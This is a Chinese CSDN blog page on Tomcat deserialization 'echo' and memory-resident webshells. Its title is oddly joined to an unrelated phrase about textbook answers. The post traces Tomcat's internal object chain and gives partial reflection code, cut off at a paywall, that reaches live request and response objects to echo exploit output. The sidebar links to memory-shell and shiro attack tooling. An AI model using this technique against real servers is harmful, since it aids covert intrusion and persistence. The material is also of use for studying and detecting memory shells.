Java安全之反序列化回显与内存码,java程序设计项目化教程课后题答案

最新推荐文章于 2024-07-15 21:11:11 发布
最新推荐文章于 2024-07-15 21:11:11 发布
阅读量422 收藏
点赞数
分类专栏: 程序员 文章标签: 面试 java 后端
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_63174420/article/details/121246113
版权

所以获取request的处理请求是

Connector—>AbstractProtocol$ConnectoinHandler—>global—>RequestInfo—>Request—>Response

而在Tomcat启动过程红会将Connector放入Service中。

image.png

而现在获取完成的流程是

StandardService—>Connector—>AbstractProtocol$ConnectoinHandler—>RequestGroupInfo(global)–>RequestInfo------->Request-------->Response

那么这时候如何获取StandardService成为了问题的一大关键。

文中给出的方法是从

Thread.currentThread.getContextClassLoader()里面获取webappClassLoaderBase,再获取上下文中的 StandardService。

最后调用链为

WebappClassLoaderBase —>

ApplicationContext(getResources().getContext()) —> StandardService—>Connector—>AbstractProtocol$ConnectoinHandler—>RequestGroupInfo(global)—>RequestInfo------->Request-------->Response

package com;

import org.apache.catalina.Context;

import org.apache.catalina.Service;

import org.apache.catalina.connector.Connector;

import org.apache.catalina.core.ApplicationContext;

import org.apache.catalina.core.StandardContext;

import org.apache.catalina.core.StandardService;

import org.apache.coyote.AbstractProtocol;

import org.apache.coyote.RequestGroupInfo;

import org.apache.coyote.RequestInfo;

import org.apache.coyote.Response;

import javax.servlet.ServletContext;

import javax.servlet.ServletException;

import javax.servlet.annotation.WebServlet;

import javax.servlet.http.HttpServlet;

import javax.servlet.http.HttpServletRequest;

import javax.servlet.http.HttpServletResponse;

import java.io.IOException;

import java.lang.reflect.Constructor;

import java.lang.reflect.Field;

import java.lang.reflect.InvocationTargetException;

import java.lang.reflect.Modifier;

import java.util.ArrayList;

@WebServlet("/demoServlet")

public class demoServlet extends HttpServlet {

protected void doPost(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException {

org.apache.catalina.loader.WebappClassLoaderBase webappClassLoaderBase = (org.apache.catalina.loader.WebappClassLoaderBase) Thread.currentThread().getContextClassLoader();

StandardContext standardContext = (StandardContext) webappClassLoaderBase.getResources().getContext();

try {

Field context = Class.forName(“org.apache.catalina.core.StandardContext”).getDeclaredField(“context”);

context.setAccessible(true);

ApplicationContext ApplicationContext = (ApplicationContext)context.get(standardContext);

Field service = Class.forName(“org.apache.catalina.core.ApplicationContext”).getDeclaredField(“service”);

service.setAccessible(true);

StandardService standardService = (StandardService)service.get(ApplicationContext);

Field connectors = Class.forName(“org.apache.catalina.core.StandardService”).getDeclaredField(“connectors”);

connectors.setAccessible(true);

Connector[] connector = (Connector[])connectors.get(standardService);

Field protocolHandler = Class.forName(“org.apache.catalina.connector.Connector”).getDeclaredField(“protocolHandler”);

protocolHandler.setAccessible(true);

// AbstractProtocol abstractProtocol = (AbstractProtocol)protocolHandler.get(connector[0]);

Class<?>[] AbstractProtocol_list = Class.forName(“org.apache.coyote.AbstractProtocol”).getDeclaredClasses();

for (Class<?> aClass : AbstractProtocol_list) {

if (aClass.getName().length()==52){

java.lang.reflect.Method getHandlerMethod = org.apache.coyote.AbstractProtocol.class.getDeclaredMethod(“getHandler”,null);

getHandlerMethod.setAccessible(true);

Field globalField = aClass.getDeclaredField(“global”);

globalField.setAccessible(true);

org.apache.coyote.RequestGroupInfo requestGroupInfo = (org.apache.coyote.RequestGroupInfo) globalField.get(getHandlerMethod.invoke(connector[0].getProtocolHandler(), null));

Field processors = Class.forName(“org.apache.coyote.RequestGroupInfo”).getDeclaredField(“processors”);

processors.setAccessible(true);

java.util.List RequestInfo_list = (java.util.List) processors.get(requestGroupInfo);

Field req = Class.forName(“org.apache.coyote.RequestInfo”).getDeclaredField(“req”);

req.setAccessible(true);

for (RequestInfo requestInfo : RequestInfo_list) {

org.apache.coyote.Request request1 =

最低0.47元/天 解锁文章
安卓开发YYDS
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
内存Webshell马详解
悦分享
11-08 4572
内存webshell相比于常规webshell更容易躲避传统安全监测设备的检测,通常被用来做持久,规避检测,持续驻留目标服务器。无文件攻击、内存Webshell、进程注入等基于内存的攻击手段也受到了大多数攻击者青睐。内存马是无文件攻击的一种常用手段,随着攻防演练热度越来越高:攻防双方的博弈,流量分析、EDR等专业安全设备被蓝方广泛使用,传统的文件上传的webshll或以文件形式驻留的后门越来越容易被检测到。因此内存马近年来越来越被重视,逐渐成为了攻击方的“必备武器”,针对内存马的防护也越来越被重视。
深入浅出内存
superprintf的博客
07-17 452
上面的都是21年之前的东西了,现在是23年7月,显然已经过去了两年半,这两年半里还有很多技术的更新。不过技术更新应该也是针对Tomcat不同版本的增加。关于内存马的利用,也延伸到了其他组件。
内存马检测排查手段
SimoSimoSimo的博客
11-05 2万+
内存马是无文件落地webshell中最常见的攻击手段,随着攻防演练对抗强度越来越高,流量分析、EDR等专业安全设备被蓝方广泛使用,传统的文件上传的webshll以及文件形式的后门容易被检测到,文件shell明显气数已尽,而内存马因其隐蔽性等优点从而越来越盛行。
一文了解内存
闵行小鱼塘
10-24 3184
随着攻防对抗的博弈愈发激烈,流量分析、EDR等专业安全设备被防守方广泛使用,传统的文件上传的webshll或以文件形式驻留的后门越来越容易被检测到,webshell终于进入内存马时代,其关键在于无文件,利用中间件的进程执行恶意代。本文试图进行一个学习,尽可能搞明白其来龙去脉
tomcat及servlet内存、Filter内存、Listener内存
你和萤火虫有两个共同点,在我的眼里都会发光,同时,都已经很多年没见了
10-23 1622
文章目录关键要点基于tomcat的内存tomcat介绍serverserviceconnectorcontainertomcat结构图环境搭建Listener -> Filter -> ServletServletListenerFilterListener内存listener介绍listener利用Filter内存Filter介绍Filter利用servlet内存参考: 内存,顾名思义,注入内存的webshell,过程中没有文件落地,因此相对来说,发现难度会更高。 关键要点 内存马根
Java安全反序列化回显内存java核心编程视频教学
m0_64384302的博客
12-12 249
org.apache.coyote.RequestGroupInfo requestGroupInfo = (org.apache.coyote.RequestGroupInfo) globalField.get(getHandlerMethod.invoke(connector[0].getProtocolHandler(), null)); Field processors = Class.forName(“org.apache.coyote.RequestGroupInfo”).getDeclared
shiro_attack:shiro反序列化进攻综合利用,包含(回显执行命令注入内存马)
03-11
shiro反序列化进攻综合利用项目基于javafx,利用shiro反序列化扩展进行回显命令执行以及注入类别内存马检出唯一密钥(SimplePrincipalCollection)cbc / gcm Tomcat / Springboot回显命令执行集成公用集合K1 / K2...
linux下java反序列化通杀回显方法的低配版实现 - 先知社区1
08-03
这个话源于解决Java反序列化利用过程中的两大痛点:可用的gadget(Java片段)和带内回显。通常,Java反序列化漏洞可能导致远程代执行,但如果没有合适的gadget或无法实现回显,攻击者很难验证漏洞是否...
C#基于银行储柜序列例子
04-23
总的来说,"C#基于银行储柜序列例子"是一个实践性的教程,它结合了面向对象编程、序列反序列化、控制台交互以及密安全等多个重要知识点,非常适合C#初学者深入理解和掌握这些核心概念。通过这个例子,学习者...
Desarrollo-de-Software-Control-Movies:JavaSE中的电影控制系统回显
04-29
例如,使用FileReader和FileWriter处理文本文件,或者使用ObjectInputStream和ObjectOutputStream进行对象序列反序列化。 5. **异常处理**:Java中,异常处理是必不可少的,它可以确保程序在遇到错误时能优雅地...
Jyre_Test_Application:开发 Android 应用程序以使用 Jyre 测试 2 个设备之间的通信
05-29
3. **DataTransfer** - 数据传输模块,可能包含了数据的序列反序列化,确保数据在传输过程中保持完整。 4. **UserInterface** - 用户界面,允许用户输入要发送的数据,查看接收的数据,以及控制连接状态。 **...
java程序设计项目案例教程库及答案
m0_63394128的博客
08-04 5787
1、 Java源程序文件的后缀是 *.javaJava字节文件的后缀名称是 *.class 。2、 Java程序实现可移值性,依靠的是 JVM 。3、 Java语言的三个分支是: JAVA SE 、 JAVA ME 、 JAVA EE 。4、 Java程序由 类 组成,如果Java使用 public class 声明类,则文件名称必须与类名称一致。5、 Java执行是从 main() 方法开始执行的,此方法的完整定
内存马原理及查杀
m0_63081418的博客
08-13 1314
内存马一些基本原理,大佬勿喷
java调用外部程序(Runtime.getRuntime().exec)详解
热门推荐
墨鸦的博客
04-29 3万+
参考:https://blog.csdn.net/tiantang_1986/article/details/51219916 ​ https://blog.csdn.net/km_moon/article/details/84751792 概述 Runtime.getRuntime().exec 用于调用外部可执行程序或系统命令,并重定向外部程序的标准输入、标准输出和标准错误到缓冲池。功能和windows“运行”类似。 格式: Process process = Runtime.getRuntime(
Java内存马基础
m0_46317063的博客
02-05 369
filter内存马基础
【Web】小白友好的Java内存马基础学习笔记
uuzeray的博客
02-10 1007
内存马(Memory Shellcode)是一种恶意攻击技术,旨在通过利用程序或操作系统的漏洞,将恶意代注入到系统内存中并执行。与传统的攻击方式不同,内存马不需要将恶意代写入磁盘上的文件,而是直接在内存中进行操作,从而避开传统的安全防护措施。内存马的危害性在于它可以绕过许多传统的安全防护机制,例如防病毒软件和防火墙,因为恶意代不会留下明显的痕迹或文件。此外,由于直接在内存中执行,内存马攻击也更难以被检测和追踪。
java反射机制的书_Java 基础 - Java反射机制 - 《[Java Web安全] 攻击Java Web应用》 - 书栈网 · BookStack...
weixin_32223631的博客
02-25 219
Java反射机制Java反射(Reflection)是Java非常重要的动态特性,通过使用反射我们不仅可以获取到任何类的成员方法(Methods)、成员变量(Fields)、构造方法(Constructors)等信息,还可以动态创建Java类实例、调用任意的类方法、修改任意的类成员变量值等。Java反射机制是Java语言的动态性的重要体现,也是Java的各种框架底层实现的灵魂。获取Class对象J...
力扣第233“数字1的个数”
最新发布
10年数据\经营分析经验,现任大厂数据分析负责人
07-15 591
本文详细解读了力扣第233“数字1的个数”,通过使用逐位分析的方法高效地解决了这一问,并提供了详细的解释和模拟面试问答。希望读者通过本文的学习,能够在力扣刷的过程中更加得心应手。
java序列回显学习.doc
07-08
本文档主要探讨了Java序列回显学习中的重要概念和技术,特别是针对Java反序列化回显方法。在许多离线或网络受限的场景中,回显是一个关键的攻击手段,尤其是对于Webshell的控制和数据泄露的防范。以下是主要内容的...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值